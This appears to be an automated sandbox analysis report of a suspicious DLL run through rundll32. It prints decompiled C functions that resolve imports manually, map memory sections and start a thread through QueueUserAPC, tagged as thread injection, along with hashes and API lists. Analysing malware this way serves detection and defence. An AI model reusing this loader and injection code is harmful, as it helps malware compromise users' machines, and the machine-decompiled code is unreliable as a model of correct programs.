                    • String ID:
                    • API String ID: 1724014008-0
                    • Opcode ID: dfab742cbf00fdabb4e9e9c6977c5ef6e95fe715dd09c0dbaaafb519c6557402
                    • Instruction ID: 92d45d045020312153f9100dc86cd2a2fdbbc283d696bd6b40702ac6f87e8d1c
                    • Opcode Fuzzy Hash: dfab742cbf00fdabb4e9e9c6977c5ef6e95fe715dd09c0dbaaafb519c6557402
                    • Instruction Fuzzy Hash: B721CFB2600108FFDB12AFA8CC85EDE7BBCEF49364F128126F615D7290D6729954CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1382 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 388 6ffa1382-6ffa13e4 NtCreateSection 389 6ffa141b-6ffa141f 388->389 390 6ffa13e6-6ffa13ef call 6ffa1b4a 388->390 396 6ffa1421-6ffa1427 389->396 392 6ffa13f4-6ffa13f8 390->392 394 6ffa13fa-6ffa1411 memset 392->394 395 6ffa1413-6ffa1419 392->395 394->396 395->396
                    C-Code - Quality: 72%
                    			E6FFA1382(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6FFA1B4A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                    0x6ffa138b
                    0x6ffa1392
                    0x6ffa1393
                    0x6ffa1394
                    0x6ffa1395
                    0x6ffa1396
                    0x6ffa13a7
                    0x6ffa13ab
                    0x6ffa13bf
                    0x6ffa13c2
                    0x6ffa13c5
                    0x6ffa13cc
                    0x6ffa13cf
                    0x6ffa13d6
                    0x6ffa13d9
                    0x6ffa13dc
                    0x6ffa13df
                    0x6ffa13e4
                    0x6ffa141f
                    0x6ffa13e6
                    0x6ffa13e9
                    0x6ffa13ef
                    0x6ffa13f4
                    0x6ffa13f8
                    0x6ffa1416
                    0x6ffa13fa
                    0x6ffa1401
                    0x6ffa140f
                    0x6ffa140f
                    0x6ffa13f8
                    0x6ffa1427

                    APIs
                    • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6FFA13DF
                      • Part of subcall function 6FFA1B4A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6FFA13F4,00000002,00000000,?,?,00000000,?,?,6FFA13F4,00000000), ref: 6FFA1B77
                    • memset.NTDLL ref: 6FFA1401
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Section$CreateViewmemset
                    • String ID: @
                    • API String ID: 2533685722-2766056989
                    • Opcode ID: e626fc497942014fb776a75f9bfd3a3f913195e61ff3eac049c0a55d52b94462
                    • Instruction ID: 8c9368ff6a6a11415ea4bf9af88d53ff6a9401a156d897be3f2c83d292c40fb5
                    • Opcode Fuzzy Hash: e626fc497942014fb776a75f9bfd3a3f913195e61ff3eac049c0a55d52b94462
                    • Instruction Fuzzy Hash: B5211AB6D00209EFDB11CFA9C8849DEFBB9EF48354F11852AE605F7210D731AA458FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1A0A Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 427 6ffa1a0a-6ffa1a27 428 6ffa1b0d-6ffa1b12 427->428 429 6ffa1a2d-6ffa1a37 427->429 429->428 430 6ffa1a3d 429->430 431 6ffa1a3e-6ffa1a4d LoadLibraryA 430->431 432 6ffa1b03-6ffa1b09 431->432 433 6ffa1a53-6ffa1a69 431->433 434 6ffa1b0c 432->434 435 6ffa1a6b-6ffa1a6f 433->435 436 6ffa1a71-6ffa1a79 433->436 434->428 435->436 437 6ffa1aef-6ffa1afb 435->437 438 6ffa1ade-6ffa1ae2 436->438 437->431 441 6ffa1b01 437->441 439 6ffa1a7b 438->439 440 6ffa1ae4 438->440 442 6ffa1a7d-6ffa1a7f 439->442 443 6ffa1a81-6ffa1a83 439->443 440->437 441->434 444 6ffa1a91-6ffa1a94 442->444 445 6ffa1a96-6ffa1a9d 443->445 446 6ffa1a85-6ffa1a8f 443->446 447 6ffa1aa0-6ffa1aa5 444->447 445->447 446->444 446->445 448 6ffa1aac 447->448 449 6ffa1aa7-6ffa1aaa 447->449 450 6ffa1ab0-6ffa1abc GetProcAddress 448->450 449->450 451 6ffa1abe-6ffa1ac3 450->451 452 6ffa1ae6-6ffa1aec 450->452 453 6ffa1acd-6ffa1adb 451->453 454 6ffa1ac5-6ffa1acb 451->454 452->437 453->438 454->453
                    C-Code - Quality: 100%
                    			E6FFA1A0A(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6ffa41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                    0x6ffa1a0a
                    0x6ffa1a13
                    0x6ffa1a18
                    0x6ffa1a1e
                    0x6ffa1a27
                    0x6ffa1a2d
                    0x6ffa1a2f
                    0x6ffa1a32
                    0x6ffa1a37
                    0x6ffa1a3e
                    0x6ffa1a3e
                    0x6ffa1a42
                    0x6ffa1a4a
                    0x6ffa1a4d
                    0x00000000
                    0x00000000
                    0x6ffa1a53
                    0x6ffa1a5d
                    0x6ffa1a5f
                    0x6ffa1a62
                    0x6ffa1a65
                    0x6ffa1a69
                    0x6ffa1a71
                    0x6ffa1a73
                    0x6ffa1a76
                    0x6ffa1ade
                    0x6ffa1ade
                    0x6ffa1ae2
                    0x00000000
                    0x00000000
                    0x6ffa1a7b
                    0x6ffa1a81
                    0x6ffa1a83
                    0x6ffa1a96
                    0x6ffa1a99
                    0x6ffa1a99
                    0x6ffa1a99
                    0x6ffa1a9d
                    0x6ffa1a85
                    0x6ffa1a85
                    0x6ffa1a8d
                    0x6ffa1a8f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa1a8f
                    0x6ffa1a7d
                    0x6ffa1a7d
                    0x6ffa1a91
                    0x6ffa1a91
                    0x6ffa1a91
                    0x6ffa1aa0
                    0x6ffa1aa3
                    0x6ffa1aa5
                    0x6ffa1aac
                    0x6ffa1aa7
                    0x6ffa1aa7
                    0x6ffa1aa7
                    0x6ffa1ab4
                    0x6ffa1aba
                    0x6ffa1abc
                    0x6ffa1aec
                    0x6ffa1abe
                    0x6ffa1abe
                    0x6ffa1ac1
                    0x6ffa1ac3
                    0x6ffa1acb
                    0x6ffa1acb
                    0x6ffa1ad0
                    0x6ffa1ad2
                    0x6ffa1ad9
                    0x6ffa1adb
                    0x6ffa1adb
                    0x6ffa1adb
                    0x00000000
                    0x6ffa1adb
                    0x00000000
                    0x6ffa1abc
                    0x6ffa1a6b
                    0x6ffa1a6d
                    0x6ffa1a6f
                    0x00000000
                    0x00000000
                    0x6ffa1a6f
                    0x6ffa1aef
                    0x6ffa1aef
                    0x6ffa1af6
                    0x6ffa1afb
                    0x00000000
                    0x00000000
                    0x6ffa1b01
                    0x6ffa1b0c
                    0x00000000
                    0x6ffa1b0c
                    0x6ffa1b03
                    0x6ffa1b03
                    0x6ffa1b09
                    0x00000000
                    0x6ffa1b09
                    0x6ffa1a37
                    0x6ffa1b0d
                    0x6ffa1b12

                    APIs
                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6FFA1A42
                    • GetProcAddress.KERNEL32(?,00000000), ref: 6FFA1AB4
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID:
                    • API String ID: 2574300362-0
                    • Opcode ID: 5e9a7e1b293ecca39a341030d82984fafab6caeb9236e38720624cadfb43478f
                    • Instruction ID: 70dc338726bd95e1eb876735c01060828c232b7a14a41d8befb6b1c64ecf161c
                    • Opcode Fuzzy Hash: 5e9a7e1b293ecca39a341030d82984fafab6caeb9236e38720624cadfb43478f
                    • Instruction Fuzzy Hash: D0311475A0021ADFDB04CFA9C980AAEB7F4FF05355B1241AAD815EB250F732EA40CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1B4A Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E6FFA1B4A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                    0x6ffa1b5c
                    0x6ffa1b62
                    0x6ffa1b70
                    0x6ffa1b77
                    0x6ffa1b7c
                    0x6ffa1b82
                    0x00000000
                    0x6ffa1b83
                    0x00000000

                    APIs
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6FFA13F4,00000002,00000000,?,?,00000000,?,?,6FFA13F4,00000000), ref: 6FFA1B77
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction ID: 4d5d60b8e22b01e5a460bb98e334ba730d2d521efb878c3d31cfe628ee6648d5
                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction Fuzzy Hash: 2AF019B590020CFFD7119FA5CC85C9FBBBDDB44394F104979B151D1050D6319E089A60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1E91 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 107 6ffa1e91-6ffa1ea3 call 6ffa1d8b 110 6ffa1ea9-6ffa1ede GetModuleHandleA GetProcAddress 107->110 111 6ffa1f64 107->111 112 6ffa1f5c-6ffa1f62 call 6ffa1e7c 110->112 113 6ffa1ee0-6ffa1ef4 GetProcAddress 110->113 114 6ffa1f6b-6ffa1f72 111->114 112->114 113->112 115 6ffa1ef6-6ffa1f0a GetProcAddress 113->115 115->112 117 6ffa1f0c-6ffa1f20 GetProcAddress 115->117 117->112 119 6ffa1f22-6ffa1f36 GetProcAddress 117->119 119->112 120 6ffa1f38-6ffa1f49 call 6ffa1382 119->120 122 6ffa1f4e-6ffa1f53 120->122 122->112 123 6ffa1f55-6ffa1f5a 122->123 123->114
                    C-Code - Quality: 100%
                    			E6FFA1E91(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6FFA1D8B(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6ffa41d0 + 0x6ffa5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6FFA1E7C(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6FFA1382(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                    0x6ffa1e9f
                    0x6ffa1ea3
                    0x6ffa1f64
                    0x6ffa1ea9
                    0x6ffa1ec1
                    0x6ffa1ed0
                    0x6ffa1ed7
                    0x6ffa1edb
                    0x6ffa1ede
                    0x6ffa1f5c
                    0x6ffa1f5d
                    0x6ffa1ee0
                    0x6ffa1eed
                    0x6ffa1ef1
                    0x6ffa1ef4
                    0x00000000
                    0x6ffa1ef6
                    0x6ffa1f03
                    0x6ffa1f07
                    0x6ffa1f0a
                    0x00000000
                    0x6ffa1f0c
                    0x6ffa1f19
                    0x6ffa1f1d
                    0x6ffa1f20
                    0x00000000
                    0x6ffa1f22
                    0x6ffa1f2f
                    0x6ffa1f33
                    0x6ffa1f36
                    0x00000000
                    0x6ffa1f38
                    0x6ffa1f3e
                    0x6ffa1f44
                    0x6ffa1f49
                    0x6ffa1f50
                    0x6ffa1f53
                    0x00000000
                    0x6ffa1f55
                    0x6ffa1f58
                    0x6ffa1f58
                    0x6ffa1f53
                    0x6ffa1f36
                    0x6ffa1f20
                    0x6ffa1f0a
                    0x6ffa1ef4
                    0x6ffa1ede
                    0x6ffa1f72

                    APIs
                      • Part of subcall function 6FFA1D8B: HeapAlloc.KERNEL32(00000000,?,6FFA188E,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA1D97
                    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6FFA123E,?,?,?,?,00000002,00000000,?,?), ref: 6FFA1EB5
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1ED7
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1EED
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F03
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F19
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F2F
                      • Part of subcall function 6FFA1382: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6FFA13DF
                      • Part of subcall function 6FFA1382: memset.NTDLL ref: 6FFA1401
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                    • String ID:
                    • API String ID: 1632424568-0
                    • Opcode ID: 35487213f554e93643777cb2254bad575d2c631c15d537eb25e917b65957cfe0
                    • Instruction ID: 6c7c67bd14982b55f6ba083089f97e311de28c796a3d9648ca0f48e2f3641bbe
                    • Opcode Fuzzy Hash: 35487213f554e93643777cb2254bad575d2c631c15d537eb25e917b65957cfe0
                    • Instruction Fuzzy Hash: D2215AB560070ADFDB01DF68C880E9A7BFCFF09694B028426F81AC7211E731E9158FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1DA0 Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 124 6ffa1da0-6ffa1db4 125 6ffa1db6-6ffa1db7 124->125 126 6ffa1e25-6ffa1e32 InterlockedDecrement 124->126 127 6ffa1e72-6ffa1e79 125->127 129 6ffa1dbd-6ffa1dca InterlockedIncrement 125->129 126->127 128 6ffa1e34-6ffa1e3a 126->128 131 6ffa1e3c 128->131 132 6ffa1e66-6ffa1e6c HeapDestroy 128->132 129->127 130 6ffa1dd0-6ffa1de4 HeapCreate 129->130 133 6ffa1e20-6ffa1e23 130->133 134 6ffa1de6-6ffa1e17 call 6ffa144a call 6ffa1d2d 130->134 135 6ffa1e41-6ffa1e51 SleepEx 131->135 132->127 133->127 134->127 142 6ffa1e19-6ffa1e1c 134->142 137 6ffa1e5a-6ffa1e60 CloseHandle 135->137 138 6ffa1e53-6ffa1e58 135->138 137->132 138->135 138->137 142->133
                    C-Code - Quality: 86%
                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6ffa4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6ffa418c;
						if( *0x6ffa418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6ffa4198;
								if( *0x6ffa4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6ffa418c);
						}
						HeapDestroy( *0x6ffa4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6ffa4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6ffa4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6ffa41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6FFA1D2D(E6FFA149B, E6FFA144A(_a12, 1, 0x6ffa4198, _t41));
							 *0x6ffa418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                    0x6ffa1da3
                    0x6ffa1daf
                    0x6ffa1db1
                    0x6ffa1db4
                    0x6ffa1e2a
                    0x6ffa1e30
                    0x6ffa1e32
                    0x6ffa1e34
                    0x6ffa1e3a
                    0x6ffa1e3c
                    0x6ffa1e41
                    0x6ffa1e44
                    0x6ffa1e4f
                    0x6ffa1e51
                    0x00000000
                    0x00000000
                    0x6ffa1e53
                    0x6ffa1e56
                    0x6ffa1e58
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa1e58
                    0x6ffa1e60
                    0x6ffa1e60
                    0x6ffa1e6c
                    0x6ffa1e6c
                    0x6ffa1db6
                    0x6ffa1db7
                    0x6ffa1dd7
                    0x6ffa1ddd
                    0x6ffa1ddf
                    0x6ffa1de4
                    0x6ffa1e20
                    0x6ffa1e20
                    0x6ffa1de6
                    0x6ffa1dee
                    0x6ffa1df5
                    0x6ffa1dff
                    0x6ffa1e0b
                    0x6ffa1e12
                    0x6ffa1e17
                    0x6ffa1e1c
                    0x00000000
                    0x6ffa1e1c
                    0x6ffa1e17
                    0x6ffa1de4
                    0x6ffa1db7
                    0x6ffa1e79

                    APIs
                    • InterlockedIncrement.KERNEL32(6FFA4188), ref: 6FFA1DC2
                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6FFA1DD7
                      • Part of subcall function 6FFA1D2D: CreateThread.KERNELBASE ref: 6FFA1D44
                      • Part of subcall function 6FFA1D2D: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6FFA1D59
                      • Part of subcall function 6FFA1D2D: GetLastError.KERNEL32(00000000), ref: 6FFA1D64
                      • Part of subcall function 6FFA1D2D: TerminateThread.KERNEL32(00000000,00000000), ref: 6FFA1D6E
                      • Part of subcall function 6FFA1D2D: CloseHandle.KERNEL32(00000000), ref: 6FFA1D75
                      • Part of subcall function 6FFA1D2D: SetLastError.KERNEL32(00000000), ref: 6FFA1D7E
                    • InterlockedDecrement.KERNEL32(6FFA4188), ref: 6FFA1E2A
                    • SleepEx.KERNEL32(00000064,00000001), ref: 6FFA1E44
                    • CloseHandle.KERNEL32 ref: 6FFA1E60
                    • HeapDestroy.KERNEL32 ref: 6FFA1E6C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                    • String ID:
                    • API String ID: 2110400756-0
                    • Opcode ID: 22c1a011eef3d9cc4a8a57b404c3e62b4855ba5737fa8becaa160795f7758eeb
                    • Instruction ID: 9b4cd8a0f5edeeab6af3188e2df1190649b5bb8a3bbdea015b534caf91472c27
                    • Opcode Fuzzy Hash: 22c1a011eef3d9cc4a8a57b404c3e62b4855ba5737fa8becaa160795f7758eeb
                    • Instruction Fuzzy Hash: 6D219D31610605EBDF028FA9CCC4A4E7BB8FF56778752802AE515D3260EB32B9208F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1D2D Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E6FFA1D2D(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6ffa41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                    0x6ffa1d44
                    0x6ffa1d4a
                    0x6ffa1d4e
                    0x6ffa1d59
                    0x6ffa1d61
                    0x6ffa1d6a
                    0x6ffa1d6e
                    0x6ffa1d75
                    0x6ffa1d7c
                    0x6ffa1d7e
                    0x6ffa1d84
                    0x6ffa1d61
                    0x6ffa1d88

                    APIs
                    • CreateThread.KERNELBASE ref: 6FFA1D44
                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6FFA1D59
                    • GetLastError.KERNEL32(00000000), ref: 6FFA1D64
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6FFA1D6E
                    • CloseHandle.KERNEL32(00000000), ref: 6FFA1D75
                    • SetLastError.KERNEL32(00000000), ref: 6FFA1D7E
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
